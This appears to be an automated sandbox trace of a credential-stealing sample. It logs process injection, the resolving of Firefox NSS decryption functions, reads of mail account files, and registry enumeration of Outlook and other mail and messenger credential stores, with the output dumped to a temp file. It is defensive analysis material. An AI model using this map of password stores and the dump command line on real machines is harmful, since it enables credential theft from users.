Get Address c:\program files (x86)\mozilla firefox\nss3.dll function = NSS_Init, address_out = 0x73f6d70b True 2
Fn
Get Address c:\program files (x86)\mozilla firefox\nss3.dll function = NSS_Shutdown, address_out = 0x73f6d13c True 2
Fn
Get Address c:\program files (x86)\mozilla firefox\nss3.dll function = PK11_GetInternalKeySlot, address_out = 0x73f03c51 True 2
Fn
Get Address c:\program files (x86)\mozilla firefox\nss3.dll function = PK11_FreeSlot, address_out = 0x73f03333 True 2
Fn
Get Address c:\program files (x86)\mozilla firefox\nss3.dll function = PK11_CheckUserPassword, address_out = 0x73eecbc4 True 2
Fn
Get Address c:\program files (x86)\mozilla firefox\nss3.dll function = PK11_Authenticate, address_out = 0x73eed3ca True 2
Fn
Get Address c:\program files (x86)\mozilla firefox\nss3.dll function = PK11SDR_Decrypt, address_out = 0x73f000a7 True 2
Fn
Get Address c:\program files (x86)\mozilla firefox\nss3.dll function = sqlite3_open, address_out = 0x74011ca0 True 1
Fn
Get Address c:\program files (x86)\mozilla firefox\nss3.dll function = sqlite3_prepare, address_out = 0x73f9ce70 True 1
Fn
Get Address c:\program files (x86)\mozilla firefox\nss3.dll function = sqlite3_step, address_out = 0x74005200 True 1
Fn
Get Address c:\program files (x86)\mozilla firefox\nss3.dll function = sqlite3_column_text, address_out = 0x73fbd400 True 1
Fn
Get Address c:\program files (x86)\mozilla firefox\nss3.dll function = sqlite3_column_int, address_out = 0x73fbd3a0 True 1
Fn
Get Address c:\program files (x86)\mozilla firefox\nss3.dll function = sqlite3_column_int64, address_out = 0x73fbd3d0 True 1
Fn
Get Address c:\program files (x86)\mozilla firefox\nss3.dll function = sqlite3_finalize, address_out = 0x73fe9f60 True 1
Fn
Get Address c:\program files (x86)\mozilla firefox\nss3.dll function = sqlite3_close, address_out = 0x73febde0 True 1
Fn
Get Address c:\program files (x86)\mozilla firefox\nss3.dll function = sqlite3_exec, address_out = 0x73fea270 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = QueryFullProcessImageNameW, address_out = 0x75a115f7 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetProcessTimes, address_out = 0x75a1d60f True 1
Fn
System (1)
+
Operation Additional Information Success Count Logfile
Get Info type = Operating System False 1
Fn
Ini (28)
+
Operation Filename Additional Information Success Count Logfile
Read C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.cfg section_name = General, key_name = ShowGridLines, default_value = 0 True 1
Fn
Read C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.cfg section_name = General, key_name = SaveFilterIndex, default_value = 0 True 1
Fn
Read C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.cfg section_name = General, key_name = ShowInfoTip, default_value = 1 True 1
Fn
Read C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.cfg section_name = General, key_name = MarkOddEvenRows, default_value = 0 True 1
Fn
Read C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.cfg section_name = General, key_name = ShowTimeInGMT, default_value = 0 True 1
Fn
Read C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.cfg section_name = General, key_name = LoadPasswordsIE, default_value = 1 True 1
Fn
Read C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.cfg section_name = General, key_name = LoadPasswordsFirefox, default_value = 1 True 1
Fn
Read C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.cfg section_name = General, key_name = LoadPasswordsChrome, default_value = 1 True 1
Fn
Read C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.cfg section_name = General, key_name = LoadPasswordsOpera, default_value = 1 True 1
Fn
Read C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.cfg section_name = General, key_name = LoadPasswordsSafari, default_value = 1 True 1
Fn
Read C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.cfg section_name = General, key_name = LoadPasswordsSeaMonkey, default_value = 1 True 1
Fn
Read C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.cfg section_name = General, key_name = LoadPasswordsYandex, default_value = 1 True 1
Fn
Read C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.cfg section_name = General, key_name = UseFirefoxProfileFolder, default_value = 0 True 1
Fn
Read C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.cfg section_name = General, key_name = UseFirefoxInstallFolder, default_value = 0 True 1
Fn
Read C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.cfg section_name = General, key_name = UseChromeProfileFolder, default_value = 0 True 1
Fn
Read C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.cfg section_name = General, key_name = UseOperaPasswordFile, default_value = 0 True 1
Fn
Read C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.cfg section_name = General, key_name = FirefoxProfileFolder False 1
Fn
Read C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.cfg section_name = General, key_name = FirefoxInstallFolder False 1
Fn
Read C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.cfg section_name = General, key_name = ChromeProfileFolder False 1
Fn
Read C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.cfg section_name = General, key_name = OperaPasswordFile False 1
Fn
Read C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.cfg section_name = General, key_name = SaveFileEncoeding, default_value = 0 True 1
Fn
Read C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.cfg section_name = General, key_name = WinPos False 1
Fn
Read C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.cfg section_name = General, key_name = Columns False 1
Fn
Read C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.cfg section_name = General, key_name = Sort, default_value = 0 True 1
Fn
Read C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\profiles.ini section_name = Profile0, key_name = Path, data_out = Profiles/3y2joh8o.default True 1
Fn
Read C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\profiles.ini section_name = Profile0, key_name = IsRelative, default_value = 0 True 1
Fn
Read C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\profiles.ini section_name = Profile1, key_name = Path False 1
Fn
Read C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\profiles.ini section_name = Profile1, key_name = IsRelative, default_value = 0 True 1
Fn
Process #11: systeminfo.exe
(Host: 179, Network: 0)
+
Information Value
ID #11
File Name c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe
Command Line "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe" /scomma "C:\ProgramData\FB2F.tmp"
Initial Working Directory C:\Users\aETAdzjz\Desktop\
Monitor Start Time: 00:01:08, Reason: Child Process
Unmonitor End Time: 00:02:23, Reason: Terminated by Timeout
Monitor Duration 00:01:15
OS Process Information
+
Information Value
PID 0x66c
Parent PID 0x81c (c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe)
Is Created or Modified Executable True
Integrity Level Medium
Username YKYD69Q\aETAdzjz
Groups
  • YKYD69Q\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • BUILTIN\Administrators (USE_FOR_DENY_ONLY)
  • BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Logon Session 00000000:00010636 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID)
  • LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x 660
0x 890
Region
+
Name Start VA End VA Type Permissions Monitored Dump YARA Match Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False
private_0x0000000000020000 0x00020000 0x00020fff Private Memory Readable, Writable True False False
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False
private_0x0000000000030000 0x00030000 0x00030fff Private Memory Readable, Writable True False False
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000060000 0x00060000 0x00061fff Pagefile Backed Memory Readable True False False
locale.nls 0x00070000 0x000d6fff Memory Mapped File Readable False False False
pagefile_0x00000000000e0000 0x000e0000 0x000e0fff Pagefile Backed Memory Readable, Writable True False False
pagefile_0x00000000000f0000 0x000f0000 0x000f1fff Pagefile Backed Memory Readable True False False
private_0x0000000000100000 0x00100000 0x0010ffff Private Memory Readable, Writable True False False
private_0x0000000000130000 0x00130000 0x0016ffff Private Memory Readable, Writable True False False
private_0x0000000000210000 0x00210000 0x0030ffff Private Memory Readable, Writable True False False
private_0x0000000000360000 0x00360000 0x0039ffff Private Memory Readable, Writable True False False
private_0x0000000000400000 0x00400000 0x0041bfff Private Memory Readable, Writable, Executable True False False
pagefile_0x0000000000420000 0x00420000 0x005a7fff Pagefile Backed Memory Readable True False False
private_0x00000000005c0000 0x005c0000 0x0063ffff Private Memory Readable, Writable True False False
pagefile_0x0000000000640000 0x00640000 0x007c0fff Pagefile Backed Memory Readable True False False
private_0x00000000007e0000 0x007e0000 0x008dffff Private Memory Readable, Writable True False False
private_0x00000000008e0000 0x008e0000 0x009dffff Private Memory Readable, Writable True False False
3292.exe 0x00be0000 0x00bfefff Memory Mapped File Readable, Writable, Executable True False False
pagefile_0x0000000000c00000 0x00c00000 0x01ffffff Pagefile Backed Memory Readable True False False
sortdefault.nls 0x02000000 0x022cefff Memory Mapped File Readable False False False
private_0x0000000002360000 0x02360000 0x0245ffff Private Memory Readable, Writable True False False
atl.dll 0x74130000 0x74143fff Memory Mapped File Readable, Writable, Executable False False False
pstorec.dll 0x74150000 0x7415cfff Memory Mapped File Readable, Writable, Executable False False False
comctl32.dll 0x742f0000 0x7448dfff Memory Mapped File Readable, Writable, Executable False False False
wow64cpu.dll 0x746e0000 0x746e7fff Memory Mapped File Readable, Writable, Executable False False False
wow64win.dll 0x746f0000 0x7474bfff Memory Mapped File Readable, Writable, Executable False False False
wow64.dll 0x74750000 0x7478efff Memory Mapped File Readable, Writable, Executable False False False
cryptbase.dll 0x74dc0000 0x74dcbfff Memory Mapped File Readable, Writable, Executable False False False
sspicli.dll 0x74dd0000 0x74e2ffff Memory Mapped File Readable, Writable, Executable False False False
imm32.dll 0x74e30000 0x74e8ffff Memory Mapped File Readable, Writable, Executable False False False
sechost.dll 0x74e90000 0x74ea8fff Memory Mapped File Readable, Writable, Executable False False False
msasn1.dll 0x750c0000 0x750cbfff Memory Mapped File Readable, Writable, Executable False False False
shlwapi.dll 0x750d0000 0x75126fff Memory Mapped File Readable, Writable, Executable False False False
gdi32.dll 0x75130000 0x751bffff Memory Mapped File Readable, Writable, Executable False False False
kernelbase.dll 0x75250000 0x75295fff Memory Mapped File Readable, Writable, Executable False False False
msvcrt.dll 0x752a0000 0x7534bfff Memory Mapped File Readable, Writable, Executable False False False
ole32.dll 0x75450000 0x755abfff Memory Mapped File Readable, Writable, Executable False False False
usp10.dll 0x755b0000 0x7564cfff Memory Mapped File Readable, Writable, Executable False False False
advapi32.dll 0x756e0000 0x7577ffff Memory Mapped File Readable, Writable, Executable False False False
lpk.dll 0x75780000 0x75789fff Memory Mapped File Readable, Writable, Executable False False False
user32.dll 0x75790000 0x7588ffff Memory Mapped File Readable, Writable, Executable False False False
crypt32.dll 0x758d0000 0x759ecfff Memory Mapped File Readable, Writable, Executable False False False
kernel32.dll 0x759f0000 0x75afffff Memory Mapped File Readable, Writable, Executable False False False
msctf.dll 0x75b00000 0x75bcbfff Memory Mapped File Readable, Writable, Executable False False False
comdlg32.dll 0x75bd0000 0x75c4afff Memory Mapped File Readable, Writable, Executable False False False
shell32.dll 0x75c50000 0x76899fff Memory Mapped File Readable, Writable, Executable False False False
rpcrt4.dll 0x76d80000 0x76e6ffff Memory Mapped File Readable, Writable, Executable False False False
private_0x0000000076e70000 0x76e70000 0x76f69fff Private Memory Readable, Writable, Executable True False False
private_0x0000000076f70000 0x76f70000 0x7708efff Private Memory Readable, Writable, Executable True False False
ntdll.dll 0x77090000 0x77238fff Memory Mapped File Readable, Writable, Executable False False False
ntdll.dll 0x77270000 0x773effff Memory Mapped File Readable, Writable, Executable False False False
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False
private_0x000000007efd8000 0x7efd8000 0x7efdafff Private Memory Readable, Writable True False False
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False
Injection Information
+
Injection Type Source Process Source Os Thread ID Injection Info Success Count Logfile
Modify Memory #7: c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe 0x84c address = 0x400000, size = 114688 True 1
Fn
Data
Modify Memory #7: c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe 0x84c address = 0x7efde008, size = 4 True 1
Fn
Data
Modify Memory #7: c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe 0x84c address = 0x7efdf010, size = 4 True 1
Fn
Data
Modify Control Flow #7: c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe 0x84c os_tid = 0x660, address = 0x0 True 1
Fn
Host Behavior
File (40)
+
Operation Filename Additional Information Success Count Logfile
Create C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows Mail\account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows Mail\account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows Mail\account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\ProgramData\FB2F.tmp desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_READ True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo_lng.ini type = file_attributes False 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Profiles type = file_attributes False 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Roaming\Thunderbird\Profiles type = file_attributes False 1
Fn
Get Info C:\Program Files (x86)\Mozilla Thunderbird type = file_attributes False 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows Mail\account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount type = size True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows Mail\account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount type = size True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows Mail\account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount type = size True 1
Fn
Read C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows Mail\account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount size = 1506, size_out = 1506 True 1
Fn
Data
Read C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows Mail\account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount size = 670, size_out = 670 True 1
Fn
Data
Read C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows Mail\account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount size = 1734, size_out = 1734 True 1
Fn
Data
Write C:\ProgramData\FB2F.tmp size = 11 True 1
Fn
Data
Write C:\ProgramData\FB2F.tmp size = 1 True 12
Fn
Data
Write C:\ProgramData\FB2F.tmp size = 12 True 1
Fn
Data
Write C:\ProgramData\FB2F.tmp size = 14 True 2
Fn
Data
Write C:\ProgramData\FB2F.tmp size = 5 True 1
Fn
Data
Write C:\ProgramData\FB2F.tmp size = 0 True 4
Fn
Write C:\ProgramData\FB2F.tmp size = 2 True 2
Fn
Data
Write C:\ProgramData\FB2F.tmp size = 4 True 2
Fn
Data
Write C:\ProgramData\FB2F.tmp size = 7 True 1
Fn
Data
Registry (97)
+
Operation Key Additional Information Success Count Logfile
Open Key HKEY_CURRENT_USER\Software\Qualcomm\Eudora\CommandLine - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Software\Qualcomm\Eudora\CommandLine\current - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Thunderbird - False 1
Fn
Open Key HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts - False 1
Fn
Open Key HKEY_CURRENT_USER\Software\Google\Google Desktop\Mailboxes - False 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts - False 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts - False 1
Fn
Open Key HKEY_CURRENT_USER\Identities - True 1
Fn
Open Key HKEY_CURRENT_USER\Identities\{31810C36-5D23-4CCE-A3B4-316DED195C38} - True 1
Fn
Open Key HKEY_CURRENT_USER\Identities\{31810C36-5D23-4CCE-A3B4-316DED195C38}\Software\Microsoft\Internet Account Manager\Accounts - False 1
Fn
Open Key HKEY_CURRENT_USER\Identities\{31810C36-5D23-4CCE-A3B4-316DED195C38}\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts - False 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles - False 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles - False 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\0a0d020000000000c000000000000046 - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\189cba75c69c634996739bac92103ebb - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\1a8bd43e654f65418fbafadeef063a57 - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\1cfb96c6c96b454ebff73da2e9f63f51 - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\3517490d76624c419a828607e2a54604 - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\467888fc50a6c6448d6cc0cf7b5307d6 - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\48dea081c9634a43a6861907855add5c - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\55aad8d134512d438564aa678cb92d66 - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\71b0295bef58e344911262b243f005ac - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\8503020000000000c000000000000046 - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2 - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001 - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\IncrediMail\Identities - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\IncrediMail\Identities - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Group Mail - False 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\MSNMessenger - False 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\MessengerService - False 1
Fn
Open Key HKEY_CURRENT_USER\Software\Yahoo\Pager - False 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL - False 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail - False 1
Fn
Read Value HKEY_CURRENT_USER\Identities\{31810C36-5D23-4CCE-A3B4-316DED195C38} value_name = Username, data = Main Identity, type = REG_SZ True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 value_name = POP3 User, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 value_name = IMAP User, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 value_name = HTTP User, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 value_name = SMTP User, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 value_name = POP3 User, data = sdjwh@dive.djh, type = REG_SZ True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 value_name = POP3 Server, data = fgerh, type = REG_SZ True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 value_name = Display Name, data = fvmmeu dufn, type = REG_SZ True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 value_name = Email, data = sdjwh@dive.djh, type = REG_SZ True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 value_name = SMTP Server, data = hthr, type = REG_SZ True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 value_name = SMTP Port, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 value_name = POP3 Port, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 value_name = POP3 Use SPA, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 value_name = POP3 Password, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 value_name = IMAP User, data = 104, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 value_name = HTTP User, data = 104, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 value_name = SMTP User, data = 104, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 value_name = POP3 User, data = 104, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 value_name = IMAP User, data = 104, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 value_name = HTTP User, data = 104, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 value_name = SMTP User, data = 104, type = REG_NONE False 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Identities - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Identities - False 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\0a0d020000000000c000000000000046 - False 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a - False 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\189cba75c69c634996739bac92103ebb - False 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\1a8bd43e654f65418fbafadeef063a57 - False 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\1cfb96c6c96b454ebff73da2e9f63f51 - False 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\3517490d76624c419a828607e2a54604 - False 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\467888fc50a6c6448d6cc0cf7b5307d6 - False 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\48dea081c9634a43a6861907855add5c - False 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook - True 1
Fn
